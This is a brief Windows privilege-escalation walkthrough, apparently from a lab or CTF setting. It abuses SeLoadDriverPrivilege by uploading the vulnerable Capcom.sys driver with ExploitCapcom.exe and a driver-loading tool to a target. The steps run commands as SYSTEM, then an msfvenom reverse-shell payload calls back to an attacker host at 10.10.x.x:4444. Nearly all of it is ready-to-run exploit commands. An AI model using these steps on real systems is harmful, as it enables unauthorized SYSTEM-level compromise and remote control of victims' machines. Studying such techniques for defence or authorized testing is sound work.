If you see this privilege, doesn't matter if it says the priv is Disabled we can Enabled it and exploit it by uploading malicious driver and using that driver we can execute our payload.
Upload the driver eoploaddriver_x64.exe, Capcom.sys file, ExploitCapcom.exe on traget machine under writable directory.
First we need to turn on the privilege of SeLoadDriverPrivilege that is disabled.
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sysNow using ExploitCapcom.exe load Capcom.sys to target machine.
.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sysAfter successfully loading Capcom.sys we can now run any cmd as privilege user with EXPLOIT keyword.
.\ExploitCapcom.exe EXPLOIT whoamiNow we can generate a revshell with msfvenom. You can also use other revshell. On Attacker vm.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exeUpload it on Traget machine. Now execute the payload.
.\ExploitCapcom.exe EXPLOIT shell.exeYou gonna get reverse shell as SYSTEM.